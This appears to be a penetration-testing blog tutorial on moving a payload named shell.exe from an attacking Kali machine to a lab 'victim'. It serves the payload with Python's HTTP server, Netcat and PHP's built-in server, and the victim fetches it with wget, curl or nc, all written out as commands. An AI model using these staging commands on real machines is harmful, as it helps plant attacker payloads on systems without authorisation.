Tools used:
Kali OS
Python 2.7 | 3.7
PHP
Netcat
Python SimpleHTTPServer:
We can create a python HTTP server that can deploy our payload very easily.
root@Pentest-Pundit:~/shells # python -m SimpleHTTPServer 80
or in python3 will use http.server module root@Pentest-Pundit:~/shells # python3 -m http.server 80
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxa2TI488bLgeO1-Kqp2Zm9imE-qErjzNMXPqSn1oTquKGRuJoApxADmF0z3_WVoU0glavfM2twPfMr_37LpTjwV5kFVPD8WDPJNqCauIDfCNOh_eZcPTBZ8OxbqlF8eKrnGZEs1wbFn4/d-rw/1-min.png)
On the client shell, we can use any command-line web-crawler or fetchers
like
Wget or
curl. We boot-up another kali machine having the username kali as a
victim machine. On this machine (victim) we have to give the following command to transfer the file.
kali@victim:~$ wget http://192.168.1.80/shell.exe
or
kali@victim:~$curl http://192.168.1.80/shell.exe --output shell.exe
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgWHc8ME02rgRIeyrICFA8zH37yTOIUFYUS_o9_tBJbDuZN9A4uSYq5TCU2uV49PyY61ollREvqfRtQ5P0k1zKb1J2eZQPZ3vGo_ybuZTU5TC6QJgFdKVvQ6NCAxH4P7rNgCunw3WKCuc/d-rw/2-min.png)
Here we can see a request in our Python Simplehttpserver from our victim PC.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirOAHMHX2Mh6YJgGRyMKx2RPgoWf96p-_ZLxpkLuZGl1kmdIbWm-RLaN0SNd-LBYsFjHcFmRAE2TNgqvqQDAmbmPPo8EvSZ4ErVGIU5ZQyZ-2csuywvkWApgk0pddZOXawbjNIAtTdhPA/d-rw/3-min.png)
Netcat:
Another way to transfer a file quickly is to use Netcat as a file transfer tool. This will help if the victim already has Netcat installed.
We will start a Netcat listener on our attacking Kali machine
(Pentest-Pundit) with the shell (file) to transfer, redirected with
< to our Netcat listener as shown below.
root@Pentest-Pundit:~/shells # nc -nlvp 80 < shell.exe
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivizPZDjFpn7pzkNJml1UINMrZhM1pkSEOeAW405i9CwoerhPyacptcG7qLCI08kDKzjsyxXUR3djkrbJp-aEbDDk8mf3omVCDZCwY3F8yXxmyR49jN7aZtYK7jGMFiyqvJ4F_yGtnoEY/d-rw/4-min.png)
We boot-up another kali machine having the username kali as a victim machine. On this machine (victim) we have to give the following command to transfer the file.
kali@victim:~$ nc -nv 192.168.1.80 80 > shell.exe
(UNKNOWN) [192.168.1.80] 80 (http) open
^C
(UNKNOWN) [192.168.1.80] 80 (http) open
^C
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3_X_cwCJo9mMreNhoK3ZwU8EYpUwYGFhQZwzzqqh_rfIjZ3E6xyxVRLeyaJjcR7WZwae2a-6URLNhoiL1_LqqHtqbFXscFRB66sOcLH8Pg69kdrAYaX8mxbTVwp1pBpCEboMGbX2ugJo/d-rw/5-min.png)
We can confirm the file size on the server-side and client side by
ls command.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVnmzeLowvUPVd5DwXtC7onAXcn_V2bM60aulND17h9IcMT9K7g41e9qQwmDKSIB0fdlei3sUsVf6MTiXlwcPRs4QSSdBFcDGEXfXqDEnrXLiA-YPAq1MuYjPQ9iprIUUttuiB_wvC36E/d-rw/6-min.png)
PHP built-in Web Server:
We can also use PHP built-in Web server to do this task in one line.
root@Pentest-Pundit:~/shells # php -S 192.168.1.80:80 -t /root/shells/
PHP 7.3.12-1 Development Server started on Tue May 5 01:09:14 2020
Listening on http://192.168.1.80:80
Document root is /root/shells
Press Ctrl-C to quit.
PHP 7.3.12-1 Development Server started on Tue May 5 01:09:14 2020
Listening on http://192.168.1.80:80
Document root is /root/shells
Press Ctrl-C to quit.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiGx036EHS-TTnIP8InxWn6Lz8iu5-3CffHxPLCltP-3wjJV3uaEhMOhngI8rKlo7IA5P-vYDAI4D0a-n6ZaXdmIKO4i1ahnSjuTbu1gxojeptzceQyPDQ_Nuke8l3fXKTDUqnZQ3QqjU/d-rw/7-min.png)
On the victim's command shell, we will transfer the shell using get or curl, that we already used.
kali@victim:~$ wget http://192.168.1.80/shell.exe
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrVxu4nhgICesFY-cKgRqBxSCYx6WzPRKfdJb1_qe4rW1Sa1TnHsZiOAOJ-T2YlhRvH1_ZmYR-rS4sq9k2FcAHaDXxlTqvinaWhDmBGScpaByBmRHE_zuCxkygtHdslHo6CGtzjgYKaNg/d-rw/8-min.png)
After transfer happens, we can see a request at the PHP built-in web server.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiioHZhygYOdfitHzeHEvAEDBQdchz38Mx8610_RgXorXsfm6tTPZ56Wg55QOcY-XPo2JYhDUuzzc5Zo5U1Od9_iPM22UieiznoTzNBTTDZFXi2foy5zjMffpbHgKEw9lGGdf-XcYgnsCY/d-rw/9-min.png)
No comments:
Post a Comment